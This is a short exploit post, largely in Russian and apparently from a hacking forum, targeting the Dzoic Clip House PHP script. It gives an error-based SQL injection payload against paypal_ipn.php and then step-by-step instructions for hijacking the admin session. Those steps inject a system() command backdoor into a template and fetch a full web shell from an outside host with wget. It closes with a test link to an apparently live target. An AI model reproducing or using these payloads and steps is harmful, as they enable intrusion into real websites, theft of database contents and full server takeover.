Dzoic Clip House exploit URL производителя : http://dzoic.com/ DEMO: http://www.cliphousedemo.com/ Error based sql inj CODE(/psystems/paypal/paypal_ipn.php): PHP: else{ $sql_query = "DELETE FROM payment_gateway WHERE order_id=".$paypal->ipn_data['custom']; $GLOBALS["DB"]->execute($sql_query); exploit: PHP: http://www.test.com/psystems/paypal/paypal_ipn.php post: custom=1 and 1=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) Заливка шелла: 1.Если не подобрался админ пасс дергаем админ сессию куки: mem_id:100000 password:хеш_пароля из бд sess_id:ид сессии из базы 2.Лезим в редактирование шаблонов "http://test.com/administrator/index.php?section=composer" 3.Создаем новую страницу и туда пихаем PHP: {php} system($_POST[cmd]); {/php} 4.Заливаем нормальный шелл : http://test.com/index.php post: PHP: page=page_name&cmd=wget -O ./uploader/tmp/swf.php http://url.com/shell.txt 5.Юзаем полноценный шелл по адреcу http://test.com/uploader/tmp/swf.php TEST LINK:http://vidiload.com/
